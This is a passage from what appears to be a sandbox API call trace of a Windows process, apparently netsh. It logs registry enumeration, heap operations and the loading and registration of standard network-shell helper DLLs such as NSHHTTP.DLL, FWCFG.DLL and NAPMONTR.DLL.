0x2e2380 [0138.389] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e28b0 | out: hHeap=0x2c0000) returned 1 [0138.390] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef3720000 [0143.980] GetProcAddress (hModule=0x7fef3720000, lpProcName="InitHelperDll") returned 0x7fef378b6d0 [0143.980] InitHelperDll () returned 0x0 [0143.983] RegisterHelper () returned 0x0 [0143.983] GetProcessHeap () returned 0x2c0000 [0143.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c0) returned 0x2f0ed0 [0143.984] GetProcessHeap () returned 0x2c0000 [0143.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x2c0000) returned 1 [0143.984] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="dhcpclient", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0143.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0143.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0143.985] GetProcessHeap () returned 0x2c0000 [0143.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x2e6d30 [0143.986] GetProcessHeap () returned 0x2c0000 [0143.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x2e23a0 [0143.986] GetProcessHeap () returned 0x2c0000 [0143.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x22) returned 0x2e7360 [0143.986] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0143.986] GetProcessHeap () returned 0x2c0000 [0143.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2910 | out: hHeap=0x2c0000) returned 1 [0143.986] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef4d70000 [0150.618] GetProcAddress (hModule=0x7fef4d70000, lpProcName="InitHelperDll") returned 0x7fef4d71a40 [0150.618] InitHelperDll () returned 0x0 [0150.618] RegisterHelper () returned 0x0 [0150.619] GetProcessHeap () returned 0x2c0000 [0150.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x318) returned 0x2f5e60 [0150.619] GetProcessHeap () returned 0x2c0000 [0150.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f0ed0 | out: hHeap=0x2c0000) returned 1 [0150.620] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wshelper", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0150.620] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0150.620] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0150.620] GetProcessHeap () returned 0x2c0000 [0150.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc8) returned 0x2f0ed0 [0150.620] GetProcessHeap () returned 0x2c0000 [0150.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2f3610 [0150.621] GetProcessHeap () returned 0x2c0000 [0150.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2f1620 [0150.621] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0150.621] GetProcessHeap () returned 0x2c0000 [0150.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x2c0000) returned 1 [0150.621] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef4370000 [0156.089] GetProcAddress (hModule=0x7fef4370000, lpProcName="InitHelperDll") returned 0x7fef4371720 [0156.089] InitHelperDll () returned 0x0 [0156.108] RegisterHelper () returned 0x0 [0156.108] GetProcessHeap () returned 0x2c0000 [0156.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x370) returned 0x2f6bd0 [0156.108] GetProcessHeap () returned 0x2c0000 [0156.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5e60 | out: hHeap=0x2c0000) returned 1 [0156.108] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshhttp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0156.109] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0156.109] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x2f5e60 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2f3630 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2f3650 [0156.109] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0156.109] GetProcessHeap () returned 0x2c0000 [0156.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f0ed0 | out: hHeap=0x2c0000) returned 1 [0156.110] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fefb970000 [0158.801] GetProcAddress (hModule=0x7fefb970000, lpProcName="InitHelperDll") returned 0x7fefb971c24 [0158.801] InitHelperDll () returned 0x0 [0158.801] RegisterHelper () returned 0x0 [0158.801] GetProcessHeap () returned 0x2c0000 [0158.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3c8) returned 0x2f6f50 [0158.802] GetProcessHeap () returned 0x2c0000 [0158.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6bd0 | out: hHeap=0x2c0000) returned 1 [0158.802] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="fwcfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0158.802] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0158.802] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x118) returned 0x2f5f60 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2f3670 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2f3690 [0158.803] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5e60 | out: hHeap=0x2c0000) returned 1 [0158.804] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef4350000 [0161.511] GetProcAddress (hModule=0x7fef4350000, lpProcName="InitHelperDll") returned 0x7fef4352d20 [0161.511] InitHelperDll () returned 0x0 [0161.511] RegisterHelper () returned 0x0 [0161.511] GetProcessHeap () returned 0x2c0000 [0161.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x420) returned 0x2fb320 [0161.511] GetProcessHeap () returned 0x2c0000 [0161.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6f50 | out: hHeap=0x2c0000) returned 1 [0161.512] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="authfwcfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0161.512] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0161.512] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0161.512] GetProcessHeap () returned 0x2c0000 [0161.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x140) returned 0x2f6bd0 [0161.512] GetProcessHeap () returned 0x2c0000 [0161.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2f36d0 [0161.513] GetProcessHeap () returned 0x2c0000 [0161.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2f6750 [0161.513] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0161.513] GetProcessHeap () returned 0x2c0000 [0161.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5f60 | out: hHeap=0x2c0000) returned 1 [0161.513] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef36a0000 [0165.831] GetProcAddress (hModule=0x7fef36a0000, lpProcName="InitHelperDll") returned 0x7fef36a5d20 [0165.831] InitHelperDll () returned 0x0 [0167.993] RegisterHelper () returned 0x0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x478) returned 0x2fe7d0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb320 | out: hHeap=0x2c0000) returned 1 [0167.993] RegisterHelper () returned 0x0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4d0) returned 0x2fec50 [0167.994] GetProcessHeap () returned 0x2c0000 [0167.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7d0 | out: hHeap=0x2c0000) returned 1 [0167.994] RegisterHelper () returned 0x0 [0167.994] GetProcessHeap () returned 0x2c0000 [0167.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x528) returned 0x2ff130 [0167.995] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec50 | out: hHeap=0x2c0000) returned 1 [0167.996] RegisterHelper () returned 0x0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x580) returned 0x2fe7d0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff130 | out: hHeap=0x2c0000) returned 1 [0167.996] RegisterHelper () returned 0x0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5d8) returned 0x2fed60 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7d0 | out: hHeap=0x2c0000) returned 1 [0167.996] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="2", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0167.996] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0167.997] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x168) returned 0x2f7170 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2f1180 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2fe200 [0167.997] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6bd0 | out: hHeap=0x2c0000) returned 1 [0167.997] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef92c0000 [0169.883] GetProcAddress (hModule=0x7fef92c0000, lpProcName="InitHelperDll") returned 0x7fef92c1924 [0169.883] InitHelperDll () returned 0x0 [0169.883] RegisterHelper () returned 0x0 [0169.883] GetProcessHeap () returned 0x2c0000 [0169.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x630) returned 0x300b40 [0169.884] GetProcessHeap () returned 0x2c0000 [0169.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed60 | out: hHeap=0x2c0000) returned 1 [0169.884] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="netiohlp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0169.884] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0169.884] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0169.884] GetProcessHeap () returned 0x2c0000 [0169.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x190) returned 0x2fb3f0 [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe320 [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2ffa00 [0169.885] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7170 | out: hHeap=0x2c0000) returned 1 [0169.885] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3660000 [0173.124] GetProcAddress (hModule=0x7fef3660000, lpProcName="InitHelperDll") returned 0x7fef367ce30 [0173.124] InitHelperDll () returned 0x0 [0173.124] RegisterHelper () returned 0x0 [0173.124] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x688) returned 0x301180 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.125] RegisterHelper () returned 0x0 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6e0) returned 0x301810 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301180 | out: hHeap=0x2c0000) returned 1 [0173.125] RegisterHelper () returned 0x0 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x738) returned 0x300b40 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301810 | out: hHeap=0x2c0000) returned 1 [0173.126] RegisterHelper () returned 0x0 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x790) returned 0x301280 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.126] RegisterHelper () returned 0x0 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7e8) returned 0x301a20 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301280 | out: hHeap=0x2c0000) returned 1 [0173.127] RegisterHelper () returned 0x0 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x302210 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301a20 | out: hHeap=0x2c0000) returned 1 [0173.127] RegisterHelper () returned 0x0 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x898) returned 0x300b40 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302210 | out: hHeap=0x2c0000) returned 1 [0173.128] RegisterHelper () returned 0x0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3013e0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.128] RegisterHelper () returned 0x0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x948) returned 0x301ce0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3013e0 | out: hHeap=0x2c0000) returned 1 [0173.129] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="whhelper", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0173.129] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0173.129] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b8) returned 0x2fb590 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe360 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2feb60 [0173.129] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0173.130] GetProcessHeap () returned 0x2c0000 [0173.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3f0 | out: hHeap=0x2c0000) returned 1 [0173.130] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef4c20000 [0174.977] GetProcAddress (hModule=0x7fef4c20000, lpProcName="InitHelperDll") returned 0x7fef4c2210c [0174.977] InitHelperDll () returned 0x0 [0174.977] RegisterHelper () returned 0x0 [0174.977] GetProcessHeap () returned 0x2c0000 [0174.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a0) returned 0x302630 [0174.978] GetProcessHeap () returned 0x2c0000 [0174.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301ce0 | out: hHeap=0x2c0000) returned 1 [0174.978] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="hnetmon", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0174.978] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0174.978] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x2fefd0 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe380 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe3a0 [0174.979] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0174.980] GetProcessHeap () returned 0x2c0000 [0174.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb590 | out: hHeap=0x2c0000) returned 1 [0174.980] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef4c10000 [0181.132] GetProcAddress (hModule=0x7fef4c10000, lpProcName="InitHelperDll") returned 0x7fef4c122a4 [0181.132] InitHelperDll () returned 0x0 [0181.132] RegisterHelper () returned 0x0 [0181.132] GetProcessHeap () returned 0x2c0000 [0181.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9f8) returned 0x302fe0 [0181.133] GetProcessHeap () returned 0x2c0000 [0181.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302630 | out: hHeap=0x2c0000) returned 1 [0181.133] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="rpc", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0181.133] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0181.133] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0181.133] GetProcessHeap () returned 0x2c0000 [0181.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x208) returned 0x3039e0 [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x2f7300 [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x2fe420 [0181.134] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefd0 | out: hHeap=0x2c0000) returned 1 [0181.135] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef4c00000 [0181.526] GetProcAddress (hModule=0x7fef4c00000, lpProcName="InitHelperDll") returned 0x7fef4c02e88 [0181.527] InitHelperDll () returned 0x0 [0181.527] RegisterHelper () returned 0x0 [0181.527] GetProcessHeap () returned 0x2c0000 [0181.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa50) returned 0x302340 [0181.527] GetProcessHeap () returned 0x2c0000 [0181.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fe0 | out: hHeap=0x2c0000) returned 1 [0181.527] RegisterHelper () returned 0x0 [0181.527] GetProcessHeap () returned 0x2c0000 [0181.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xaa8) returned 0x302da0 [0181.528] GetProcessHeap () returned 0x2c0000 [0181.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302340 | out: hHeap=0x2c0000) returned 1 [0181.529] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="dot3cfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0181.529] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0181.529] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0181.529] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x2fefd0 [0181.530] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe440 [0181.530] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe460 [0181.530] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0181.530] GetProcessHeap () returned 0x2c0000 [0181.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3039e0 | out: hHeap=0x2c0000) returned 1 [0181.531] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef4be0000 [0183.906] GetProcAddress (hModule=0x7fef4be0000, lpProcName="InitHelperDll") returned 0x7fef4be390c [0183.906] InitHelperDll () returned 0x0 [0183.906] RegisterHelper () returned 0x0 [0183.906] GetProcessHeap () returned 0x2c0000 [0183.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb00) returned 0x304c60 [0183.907] GetProcessHeap () returned 0x2c0000 [0183.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302da0 | out: hHeap=0x2c0000) returned 1 [0183.907] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="napmontr", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0183.907] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0183.908] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x258) returned 0x305770 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe500 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x302760 [0183.908] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0183.909] GetProcessHeap () returned 0x2c0000 [0183.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefd0 | out: hHeap=0x2c0000) returned 1 [0183.909] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef3450000 [0189.238] GetProcAddress (hModule=0x7fef3450000, lpProcName="InitHelperDll") returned 0x7fef346048c [0189.238] InitHelperDll () returned 0x0 [0189.238] RegisterHelper () returned 0x0 [0189.238] GetProcessHeap () returned 0x2c0000 [0189.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb58) returned 0x3059d0 [0189.240] GetProcessHeap () returned 0x2c0000 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x304c60 | out: hHeap=0x2c0000) returned 1 [0189.240] RegisterHelper () returned 0x0 [0189.240] GetProcessHeap () returned 0x2c0000 [0189.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbb0) returned 0x306530 [0189.241] GetProcessHeap () returned 0x2c0000 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3059d0 | out: hHeap=0x2c0000) returned 1 [0189.242] RegisterHelper () returned 0x0 